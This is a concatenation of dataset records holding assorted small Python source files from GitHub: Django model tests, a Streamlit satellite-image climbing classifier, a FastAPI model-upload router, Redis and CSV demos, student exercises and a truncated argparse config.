self.static_analysis_reports.delete()\n self.fail(\"StaticAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n\n def test_taskreports_foreignkey_dynamicreports_cannot_delete(self):\n \"\"\"\n This test checks if the DynamicAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n self.dynamic_analysis_reports.delete()\n self.fail(\"DynamicAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n\n def test_taskreports_foreignkey_networkreports_cannot_delete(self):\n \"\"\"\n This test checks if the NetworkAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n self.network_analysis_reports.delete()\n self.fail(\"NetworkAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n","repo_name":"nikhilh-20/ELFEN","sub_path":"tests/database/test_taskreports.py","file_name":"test_taskreports.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"37"} +{"seq_id":"18489758922","text":"import time\nimport os\nimport pathlib, platform\nimport pprint as pp\nimport shutil\nfrom io import BytesIO\nfrom os.path import basename, join\nimport timm\n\nfrom natsort import natsorted\nimport skimage\nimport streamlit as st\nfrom fastai.vision.all import PILImage, load_learner, Image, platform, requests\nimport timm\nfrom natsort import natsorted\nfrom skimage import io\nfrom skimage.transform import resize\n\nif platform.system() == \"Windows\":\n print(\"on Windows OS - adjusting PosixPath\")\n temp = pathlib.PosixPath\n pathlib.PosixPath = pathlib.WindowsPath\n\n\ndef load_best_model():\n try:\n path_to_archive = r\"model-resnetv2_50x1_bigtransfer_u.zip\"\n best_model_name = \"model-resnetv2_50x1_bigtransfer.pkl\"\n shutil.unpack_archive(path_to_archive)\n best_model = load_learner(join(os.getcwd(), best_model_name), cpu=True)\n except:\n st.write(\"unable to load locally. 
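The protection checks above can be written with assertRaises instead of try/except/self.fail — same behaviour (Django raises ProtectedError, a subclass of IntegrityError, for on_delete=models.PROTECT), slightly more idiomatic unittest. A sketch of one such method inside the TestCase above:

from django.db.utils import IntegrityError

def test_taskreports_foreignkey_staticreports_cannot_delete(self):
    with self.assertRaises(IntegrityError):
        self.static_analysis_reports.delete()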
downloading model file\")\n model_b_best = \"https://www.dropbox.com/scl/fi/kfgvaam338d7qfyc4y0mr/model-resnetv2_50x1_bigtransfer.pkl?dl=1\"\n best_model_response = requests.get(model_b_best)\n best_model = load_learner(BytesIO(best_model_response.content), cpu=True)\n\n return best_model\n\n\ndef load_mixnet_model():\n try:\n path_to_model = r\"model-mixnetXL-20epoch_u.pil\"\n model = load_learner(path_to_model, cpu=True)\n except:\n st.write(\"unable to load locally. downloading model file\")\n model_backup = (\n \"https://www.dropbox.com/scl/fi/48ez7tzm1q7h4o5njn0q8/model-mixnetXL-20epoch.pkl?dl=1\"\n )\n model_response = requests.get(model_backup)\n model = load_learner(BytesIO(model_response.content), cpu=True)\n\n return model\n\n\nsupplemental_dir = os.path.join(os.getcwd(), \"info\")\nfp_header = os.path.join(supplemental_dir, \"climb_area_examples.png\")\n\nst.title(\"GeoGrip: A satellite rock climbing spot detection app\")\nst.markdown(\n \"by Piyush Mohapatra | [GitHub](https://github.com/piyush-mk)\"\n)\n\nst.markdown(\n \"and Kunal\"\n)\n\n\nwith st.beta_container():\n st.markdown(\n \"*Welcome to our app that evaluates satellite or aerial images of the selected terrain and \"\n \"and determines its suitability for outdoor bouldering.*\"\n )\nst.markdown(\"---\")\nst.markdown(\"**Examples of Images in the *climb area* class**\")\nst.image(skimage.io.imread(fp_header))\nst.markdown(\"---\")\nwith st.beta_container():\n st.subheader(\"Test sattelite images\")\n st.markdown(\n \"The following images were not used for model training\"\n )\n\n\n@st.cache\ndef load_image(image_file):\n img = Image.open(image_file)\n return img\n\n\ndef predict(img, img_flex, use_best_model=False):\n st.image(img, caption=\"Image chosen to analyze\", use_column_width=True)\n\n if use_best_model:\n model_pred = load_best_model()\n else:\n model_pred = load_mixnet_model()\n\n with st.spinner(\"model inference running...\"):\n time.sleep(3)\n if not isinstance(img_flex, str):\n fancy_class = PILImage(img_flex)\n model_pred.precompute = False\n pred_class, pred_items, pred_prob = model_pred.predict(fancy_class)\n else:\n pred_class, pred_items, pred_prob = model_pred.predict(img_flex)\n prob_np = pred_prob.numpy()\n\n if str(pred_class) == \"climb_area\":\n st.balloons()\n st.subheader(\n \"Area in test image is good for climbing! 
{}% confident.\".format(\n round(100 * prob_np[0], 2)\n )\n )\n else:\n st.subheader(\n \"Area in test image not great for climbing :/ - {}% confident.\".format(\n 100 - round(100 * prob_np[0], 2)\n )\n )\n\n\nwant_adv = st.checkbox(\"Use Advanced model (slower)\")\nif want_adv:\n st.markdown(\"*analyzing with advanced model*\")\noption1_text = \"Use an example image\"\noption2_text = \"Upload a custom image for analysis\"\noption = st.radio(\"Choose a method to load an image:\", [option1_text, option2_text])\n\nif option == option1_text:\n working_dir = os.path.join(os.getcwd(), \"test_images\")\n test_images = natsorted(\n [\n f\n for f in os.listdir(working_dir)\n if os.path.isfile(os.path.join(working_dir, f))\n ]\n )\n test_image = st.selectbox(\"Please select a test image:\", test_images)\n\n if st.button(\"Analyze!\"):\n file_path = os.path.join(working_dir, test_image)\n img = skimage.io.imread(file_path)\n img = resize(img, (256, 256))\n\n predict(img, file_path, want_adv)\nelse:\n image_file = st.file_uploader(\"Upload Image\", type=[\"png\", \"jpeg\", \"jpg\"])\n if st.button(\"Analyze!\"):\n if image_file is not None:\n file_details = {\n \"Filename\": image_file.name,\n \"FileType\": image_file.type,\n \"FileSize\": image_file.size,\n }\n base_img = load_image(image_file)\n img = base_img.resize((256, 256))\n img = img.convert(\"RGB\")\n predict(img, img, want_adv)\nst.markdown(\"---\")\nst.subheader(\"How it Works:\")\nst.markdown(\n \"**GeoGrip** uses Convolutional Neural Network (CNN) trained on a labeled dataset (\"\n \"approx. 3000 satellite images, each 256x256 in two classes) with two classes. More \"\n \"specifically, the primary model is MixNet-XL\"\n)\n","repo_name":"piyush-mk/GeoGrip","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21202126209","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\n Module :mod:``\n\n This Module is created to...\n\n LICENSE: The End User license agreement is located at the entry level.\n\n\"\"\"\n\n# ----------- START: Native Imports ---------- #\nimport os\n# ----------- END: Native Imports ---------- #\n\n# ----------- START: Third Party Imports ---------- #\n# ----------- END: Third Party Imports ---------- #\n\n# ----------- START: In-App Imports ---------- #\nfrom core.utils.environ import get_build_path\n# ----------- END: In-App Imports ---------- #\n\nBUILD_PATH = get_build_path()\n\nPROJECT_HOME = 'core'\n\nSTATIC_FILE_ROOT_PATH = \"src/core.backend/core/backend/static\"\n\nSTATIC_JS_FILE_PATH = \"{}/js\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_CSS_FILE_PATH = \"{}/css\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_VIEW_FILE_PATH = \"{}/htmls\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_IMAGE_FILE_PATH = \"{}/images\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_FONT_FILE_PATH = \"{}/fonts\".format(STATIC_FILE_ROOT_PATH)\n\nCONFIG_FILE_ROOT_PATH = os.path.join(BUILD_PATH, 'ini')\n\nRULES_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"rules.ini\")\nMASTER_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"master.ini\")\nCLIENT_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"client.ini\")\nCLIENT_TEMPLATE_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"client_tpl.ini\")\nNODE_TEMPLATE_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, 
\"node_tpl.ini\")\n","repo_name":"SivaCn/core.backend","sub_path":"core/backend/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22001537882","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.30'\n\nsetup(name='Twister',\n version=version,\n description=\"Twitter Streaming Server\",\n long_description=\"\"\"\\\nTwitter Streaming Server\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='python twitter',\n author='Jun Kimura',\n author_email='jksmphone@gmail.com',\n url='',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","repo_name":"bluele/Twister","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23595930308","text":"\"\"\"\n demonstrate use of Redis\n\"\"\"\n\n\nimport login_database\nimport utilities\n\n\ndef run_example():\n \"\"\"\n uses non-presistent Redis only (as a cache)\n\n \"\"\"\n\n log = utilities.configure_logger('default', '../logs/redis_script.log')\n\n try:\n log.info('Step 1: connect to Redis')\n r = login_database.login_redis_cloud()\n\n log.info('Step 2: cache some data in Redis')\n #r.set('andy', 'andy@somewhere.com')\n\n r.rpush('customer1', 'sirisha', '206-111-1111', '98111')\n r.rpush('customer2', 'jessy', '206-222-2222', '98129')\n r.rpush('customer3', 'david', '206-333-3333', '98127')\n r.rpush('customer4', 'sam', '425-111-2222', '98052')\n r.rpush('customer5', 'alex', '425-222-3333', '98007')\n r.rpush('customer6', 'bill', '425-333-4444', '98006')\n\n print(f\"Length of list for customer1 is: {r.llen('customer1')}\")\n print(f\"Database size: {r.dbsize()}\")\n print(f\"customer1 name:{r.lindex('customer1', 0)}\")\n print(f\"customer1 telephone: {r.lindex('zip',1)}\")\n print(f\"customer1 zip: {r.lindex('customer1', 2)}\")\n\n except Exception as e:\n print(f'Redis error: {e}')\n\n\nif __name__ ==\"__main__\":\n run_example()\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/msirisha/lesson08/activity/src/redis_script.py","file_name":"redis_script.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7122975621","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: is_valid_ext.py\n\n Description: Unit testing of is_valid_ext in rmq_2_isse.py.\n\n Usage:\n test/unit/rmq_2_isse/is_valid_ext.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport rmq_2_isse\nimport version\n\n__version__ = version.__version__\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp -> Initialize testing environment.\n test_is_valid_ext_empty_set -> Test with empty ignore set.\n test_is_valid_ext_not_fnd -> Test with no find in set.\n test_is_valid_ext_fnd 
-> Test with one find in set.\n tearDown -> Clean up of testing environment.\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n class CfgTest(object):\n\n \"\"\"Class: CfgTest\n\n Description: Class which is a representation of a cfg module.\n\n Methods:\n __init__ -> Initialize configuration environment.\n\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Method: __init__\n\n Description: Initialization instance of the CfgTest class.\n\n Arguments:\n\n \"\"\"\n\n self.ignore_ext = [\"_kmz.64.txt\", \"_pptx.64.txt\"]\n\n self.ct = CfgTest()\n\n self.fname = \"File1_kmz.64.txt\"\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_empty_set(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_empty_set\n\n Description: Test is_valid_ext function with empty ignore set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.ct.ignore_ext = []\n\n self.assertTrue(rmq_2_isse.is_valid_ext(self.fname, self.ct, mock_log))\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_not_fnd(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_not_fnd\n\n Description: Test is_valid_ext function with not found in set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.fname = \"File1.txt\"\n\n self.assertTrue(rmq_2_isse.is_valid_ext(self.fname, self.ct, mock_log))\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_fnd(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_fnd\n\n Description: Test is_valid_ext function with one find in set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.assertFalse(rmq_2_isse.is_valid_ext(self.fname,\n self.ct, mock_log))\n\n def tearDown(self):\n\n \"\"\"Function: tearDown\n\n Description: Clean up of unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.ct = None\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mjpernot/rabbitmq-isse","sub_path":"test/unit/rmq_2_isse/is_valid_ext.py","file_name":"is_valid_ext.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34824243328","text":"# Full path and name to your csv file\ncsv_filepathname=\"/home/samuel/Documents/Django/projects/wawa/zip/zip.csv\"\n# Full path to your django project directory\nyour_djangoproject_home=\"/home/samuel/Documents/Django/projects/wawa\"\n \nimport sys,os\nsys.path.append(your_djangoproject_home)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\n \nfrom trotro.models import ZipCode\n \nimport csv\ndataReader = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\n \nfor row in dataReader:\n if row[0] != 'ZIPCODE': # Ignore the header row, import everything else\n zipcode = ZipCode()\n zipcode.zipcode = row[0]\n zipcode.city = row[1]\n zipcode.statecode = row[2]\n zipcode.statename = row[3]\n zipcode.save()\n","repo_name":"aiti-ghana-2012/TroApp","sub_path":"wawa/zip/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70256101226","text":"taqueria_menu = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\n\n\ndef main():\n total = 0\n while True:\n try:\n total += get_itens()\n 
except KeyError:\n pass\n except EOFError:\n print(\"\\n\")\n break\n else:\n print(f\"Total: ${total:.2f}\")\n\n\n\ndef get_itens():\n item = input(\"Item: \").title()\n if item in taqueria_menu:\n return taqueria_menu.get(item)\n else:\n raise KeyError\n\nmain()","repo_name":"jessicamosouza/cs50-python","sub_path":"pset3/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29387040476","text":"\"\"\"Module containing API router for tensor\ntrigger functionality\"\"\"\n\nimport logging\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends, status\nfrom fastapi.encoders import jsonable_encoder as je\nfrom fastapi.responses import JSONResponse\n\nfrom src.utils import json_response_with_message, get_user, \\\n generate_base64_file, Base64FileMetadata, parse_base64_file\nfrom src.persistence.postgres import get_user_model, get_user_models, \\\n insert_user_model, delete_user_model\nfrom src.persistence.s3 import upload_s3_file, retrieve_s3_file, \\\n delete_s3_file\nfrom src.config import PG_CREDENTIALS\nfrom src.models.models import ModelUploadRequest\nfrom src.logic.tensor import validate_upload_content\n\n\nLOGGER = logging.getLogger(__name__)\nROUTER = APIRouter()\n\n@ROUTER.get('')\nasync def get_models_handler(uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve models\n for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving models for user %s', uid)\n # get all models from postgres database and convert to dict\n models = [m._asdict() for m in get_user_models(PG_CREDENTIALS, uid)]\n content = {'http_code': status.HTTP_200_OK,\n 'models': models}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.get('/{model_id}/content')\nasync def get_model_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve model by\n model ID for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving model %s for user %s', model_id, uid)\n model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n if model_meta is None:\n return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n s3_data = retrieve_s3_file('/tensor-trigger/' + str(model_id))\n # generate metadata for file (including mime type) and convert to\n # base64 encoded format\n meta = Base64FileMetadata(file_size=0, mime_type='application/octet-stream')\n content = {'http_code': status.HTTP_200_OK,\n 'model': generate_base64_file(s3_data, meta)}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.get('/{model_id}/metadata')\nasync def get_model_meta_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve model by\n model ID for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving model %s for user %s', model_id, uid)\n model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n if model_meta is None:\n return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n content = {'http_code': status.HTTP_200_OK,\n 'model': model_meta._asdict()}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.post('/new')\nasync def new_model_handler(r: ModelUploadRequest, uid: 
str = Depends(get_user())) -> JSONResponse:\n    \"\"\"API handler used to upload a new model\n    for a given user\n\n    Returns:\n        JSONResponse: [description]\n    \"\"\"\n\n    LOGGER.debug('received request to upload new model for user %s', uid)\n    # insert into postgres database and retrieve model ID\n    try:\n        meta, bytes_data = parse_base64_file(r.model_content)\n        # try to parse uploaded content to tensorflow model\n        expected_shapes = validate_upload_content(bytes_data, r.model_schema)\n        bytes_data.seek(0)\n    except Exception:\n        LOGGER.exception('unable to parse file')\n        return json_response_with_message(status.HTTP_400_BAD_REQUEST, 'Invalid model data')\n\n    model_id = insert_user_model(PG_CREDENTIALS,\n                                 uid,\n                                 r.model_name,\n                                 r.model_description,\n                                 r.model_schema,\n                                 meta.file_size,\n                                 expected_shapes.input_shape,\n                                 expected_shapes.output_shape)\n    # upload data to s3 bucket\n    upload_s3_file(bytes_data, '/tensor-trigger/' + str(model_id))\n    return json_response_with_message(status.HTTP_201_CREATED, 'Successfully created model')\n\n\n@ROUTER.delete('/{model_id}')\nasync def delete_model_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n    \"\"\"API handler used to delete model\n\n    Args:\n        model_id (UUID): [description]\n        uid (str, optional): [description]. Defaults to Depends(get_user()).\n\n    Returns:\n        JSONResponse: [description]\n    \"\"\"\n\n    LOGGER.debug('deleting model %s for user %s', model_id, uid)\n    model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n    if model_meta is None:\n        return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n    # delete model from S3 bucket and from postgres database\n    delete_s3_file('/tensor-trigger/' + str(model_id))\n    delete_user_model(PG_CREDENTIALS, uid, model_id)\n\n    content = {'http_code': status.HTTP_200_OK,\n               'message': 'Successfully deleted model'}\n    return JSONResponse(status_code=status.HTTP_200_OK, content=content)\n","repo_name":"PSauerborn/tensor-trigger","sub_path":"app/src/routers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13366172353","text":"# Problem description\n# There are two words, begin and target, and a set of words called words. Using the rules below, we want to find the shortest transformation sequence that turns begin into target.\n# 1. Only one letter may be changed at a time.\n# 2. 
You can only transform into words contained in words.\n# For example, if begin is hit, target is cog, and words is [hot,dot,dog,lot,log,cog], it can be transformed in 4 steps: hit -> hot -> dot -> dog -> cog.\n# Given the two words begin and target and the word set words as parameters, write a solution function that returns the minimum number of steps needed to transform begin into target.\n\n# Constraints\n# Each word consists only of lowercase letters.\n# Each word is between 3 and 10 characters long, and all words have the same length.\n# words contains between 3 and 50 words, with no duplicate words.\n# begin and target are not equal.\n# If no transformation is possible, return 0.\n\ndef solution(begin, target, words):\n    # First of all, return 0 right away if the target word is not in the words list.\n    if target not in words:\n        return 0\n\n    answer = 0\n    # Push the start node, begin, onto the stack used for the DFS.\n    stack = [begin]\n    # To avoid exploring a word that has already been visited, \n    # track visit state in a data structure called visited.\n    # No words have been visited yet, so initialize everything to 0.\n    visited = [0] * len(words)\n    \n    \n    while stack:\n        cur = stack.pop()\n        if cur == target:\n            return answer\n        \n        for i in range(len(words)):\n            diffCnt = 0\n            for j in range(len(cur)):\n                if cur[j] != words[i][j]:\n                    diffCnt += 1\n\n            if diffCnt == 1:\n                if visited[i] == 0:\n                    visited[i] = 1\n                    stack.append(words[i])\n                else:\n                    continue\n        answer += 1\n\n    return answer\n\n\n# test case 1\nprint(solution(\"hit\", \"cog\",[\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"] )) # 4\nprint()\n# test case 2\nprint(solution(\"hit\", \"cog\", [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"])) #0\n","repo_name":"Seungyoonkim66/Programmers-Coding-Test","sub_path":"Python/DFS_BFS/단어 변환.py","file_name":"단어 변환.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1966181161","text":"'''\nWritten by Kenny William Nyallau ©2020\nThis is a python implementation of Rover challenge\n'''\nfrom rover import Rover\nfrom plateau import Plateau\nimport re\n\ndef main():\n\n    print(\"---WELCOME TO ROVER SIMULATOR---\")\n    rover = Rover()\n    plateau = Plateau()\n\n    rover.setRoverName()\n    plateau.setPlateauSize()\n    rover.setCoordinatesAndOrientation()\n    rover.setInstruction()\n    plateau.setRoverCoordinates(rover.x, rover.y)\n    rover.setPlateauCoordinates(plateau.px, plateau.py)\n    \n    print(f\"{rover.name} is starting at x: {rover.x},y: {rover.y}, orientation: {rover.orientation}\")\n    rover.moveRover()\n    print(f\"{rover.name} has arrived at x: {rover.x},y: {rover.y}, orientation: {rover.orientation}\")\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"k3nnywilliam/rover-simulator","sub_path":"python_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17492438672","text":"import os\nimport json\n\nfrom alfanous import paths\nfrom alfanous.engines import QuranicSearchEngine, FuzzyQuranicSearchEngine\nfrom alfanous.engines import TraductionSearchEngine, WordSearchEngine\n\n\ndef recitations(path=paths.RECITATIONS_LIST_FILE):\n    try:\n        myfile = open(path)\n    except IOError:\n        return {}\n    return json.loads(myfile.read()) if myfile else {}\n\n\ndef translations(path=paths.TRANSLATIONS_LIST_FILE):\n    try:\n        myfile = open(path)\n    except IOError:\n        return {}\n    return json.loads(myfile.read()) if myfile else {}\n\n\ndef hints(path=paths.HINTS_FILE):\n    myfile = open(path)\n    return json.loads(myfile.read()) if myfile else {}\n\n\ndef stats(path=paths.STATS_FILE, ref_path=paths.STATS_REFERENCE_FILE):\n    if os.path.exists(path):\n        myfile = open(path)\n    else:\n        path_dirpart = os.path.dirname(path)\n        if not os.path.exists(path_dirpart):\n            
os.makedirs(path_dirpart)\n\n        ref_file = open(ref_path, \"r\")\n        myfile = open(path, \"w+\")\n        myfile.write(ref_file.read())\n        myfile.seek(0)\n    return json.loads(myfile.read()) if myfile else {}\n\n\ndef information(path=paths.INFORMATION_FILE):\n    myfile = open(path)\n    return json.loads(myfile.read()) if myfile else {}\n\n\ndef QSE(path=paths.QSE_INDEX):\n    return QuranicSearchEngine(path)\n\n\ndef FQSE(path=paths.QSE_INDEX):\n    return FuzzyQuranicSearchEngine(path)\n\n\ndef TSE(path=paths.TSE_INDEX):\n    return TraductionSearchEngine(path)\n\n\ndef WSE(path=paths.WSE_INDEX):\n    return WordSearchEngine(path)\n\n\ntry:\n    from alfanous.dynamic_resources.arabicnames_dyn import ara2eng_names as Fields\nexcept ImportError:\n    Fields = {}\ntry:\n    from alfanous.dynamic_resources.std2uth_dyn import std2uth_words\nexcept ImportError:\n    std2uth_words = {}\ntry:\n    from alfanous.dynamic_resources.vocalizations_dyn import vocalization_dict\nexcept ImportError:\n    vocalization_dict = {}\ntry:\n    from alfanous.dynamic_resources.synonymes_dyn import syndict\nexcept ImportError:\n    syndict = {}\ntry:\n    from alfanous.dynamic_resources.derivations_dyn import derivedict\nexcept ImportError:\n    derivedict = {\"root\": []}","repo_name":"Alfanous-team/alfanous","sub_path":"src/alfanous/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"37"} +{"seq_id":"11482787749","text":"import tkinter as tk\nimport time\nfrom threading import Thread, Condition\n\n# Globals\n_current_time = 30\n\n# Functions\ndef update_timer_loop(cv):\n    global _current_time\n    # Condition.wait() requires the underlying lock to be held.\n    with cv:\n        while True:\n            cv.wait(1)\n            if _current_time > 0:\n                _current_time -= 1\n                label.config(text = _current_time)\n            else:\n                break\n\ndef reset_countdown(cv):\n    global _current_time\n    # Acquire the lock before mutating shared state and notifying waiters.\n    with cv:\n        _current_time = 30\n        cv.notify_all()\n\n# Main\nwindow = tk.Tk()\n\n# condition variable for thread sync\ncv = Condition()\n\ntimer_thread = Thread(target=update_timer_loop,args=[cv])\ntimer_thread.start()\n\n# label\nlabel = tk.Label(window, text = _current_time, font=(\"Luminari\", 36,\"bold italic\"))\nlabel.pack()\n\n# button\nbutton_image = tk.PhotoImage(file='/home/company/Downloads/IMG_3750.PNG')\nbutton = tk.Button(window, image=button_image, command=lambda: reset_countdown(cv))\nbutton.pack(pady=30)\n\nwindow.geometry(\"1600x1600\")\nwindow.mainloop()\ntimer_thread.join()\n","repo_name":"merekg/tinker","sub_path":"python/TkinterGUI/redButton.py","file_name":"redButton.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17231624497","text":"lists = ['Learn Python','Learn Java','Go Swimming','Have dinner',\r\n         'Go to bed','exist']\r\nprint('Please choose your option from the list below')\r\ni=1\r\nfor item in lists:\r\n    print(str(i)+'. 
{}'.format(item))\r\n    i += 1\r\nselect=int(input())\r\nprint('you selected {}'.format(lists[select - 1]))\r\n\r\n\r\n","repo_name":"Rupam-Shil/Python-Beginners-to-Pro","sub_path":"Projectflow/proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11087239315","text":"from typing import Optional\n\nfrom pydantic import BaseModel\n\nfrom modules.gacha.banner import GenshinBannerType, GachaBanner\nfrom modules.gacha.player.banner import PlayerGachaBannerInfo\n\n\nclass PlayerGachaInfo(BaseModel):\n    \"\"\"All of a player's gacha information\"\"\"\n\n    standard_banner: Optional[PlayerGachaBannerInfo] = None\n    event_weapon_banner: Optional[PlayerGachaBannerInfo] = None\n    event_character_banner: Optional[PlayerGachaBannerInfo] = None\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        if self.standard_banner is None:\n            self.standard_banner = PlayerGachaBannerInfo()\n        if self.event_weapon_banner is None:\n            self.event_weapon_banner = PlayerGachaBannerInfo()\n        if self.event_character_banner is None:\n            self.event_character_banner = PlayerGachaBannerInfo()\n\n    def get_banner_info(self, banner: GachaBanner) -> PlayerGachaBannerInfo:\n        if banner.banner_type == GenshinBannerType.EVENT:\n            return self.event_character_banner\n        if banner.banner_type == GenshinBannerType.WEAPON:\n            return self.event_weapon_banner\n        return self.standard_banner\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"modules/gacha/player/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"32775972415","text":"import argparse\nfrom typing import Union, List\n\nfrom src.Constants import Constants\n\n\nclass GeneralConfigArgumentsParser:\n    def __init__(self):\n        self.parser = argparse.ArgumentParser(description='Args parser for general parameters')\n        self.parser.add_argument('--algo', type=str, help='Algorithm to be used', required=True,\n                                 choices=Constants.ALGORITHMS.keys())\n        self.parser.add_argument('--env', type=str, help='OpenAI Gym environment name', default=\"Humanoid-v2\")\n        self.parser.add_argument('--eval_env', type=str, help='OpenAI Gym environment name', default=\"Humanoid-v2\")\n        self.parser.add_argument('--num_parallel_envs', type=int, help='Number of CPU cores to use', required=True)\n        self.parser.add_argument('--max_timesteps', 